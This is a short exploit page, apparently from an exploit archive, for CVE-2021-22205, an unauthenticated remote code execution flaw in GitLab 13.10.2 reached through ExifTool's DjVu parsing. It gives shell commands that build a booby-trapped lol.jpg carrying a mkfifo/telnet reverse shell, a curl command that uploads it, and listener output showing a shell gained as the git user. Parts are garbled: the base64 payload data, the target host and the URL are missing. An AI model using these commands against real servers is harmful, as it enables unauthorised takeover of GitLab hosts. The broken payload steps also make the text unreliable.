GitLab 13.10.2 Remote Code Execution

GitLab version 13.10.2 remote code execution exploit that provides a reverse shell.

MD5 | a203e85e39e4798bc3ada54cb3cc7271

# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)
# Shodan Dork:
# Date: 11/01/2021
# Exploit Author: Jacob Baines
# Vendor Homepage:
# Software Link:
# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8
# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)
# CVE : CVE-2021-22205
# Vendor Advisory:
# Root Cause Analysis:

Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.

1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to port 1270.

echo -e
| base64 -d > lol.jpg
echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 1270 0<$TF | sh 1>$TF' >> lol.jpg
echo -n
| base64 -d >> lol.jpg

2. Sending the payload. Any random endpoint will do.

curl -v -F '[email protected]'$(openssl rand -hex 8)

2a. Sample Output from the reverse shell:

$ nc -lnvp 1270
Listening on [] (family 0, port 1270)
Connection from [] port 1270 [tcp/*] accepted (family 2, sport
uid=998(git) gid=998(git) groups=998(git)

Related Posts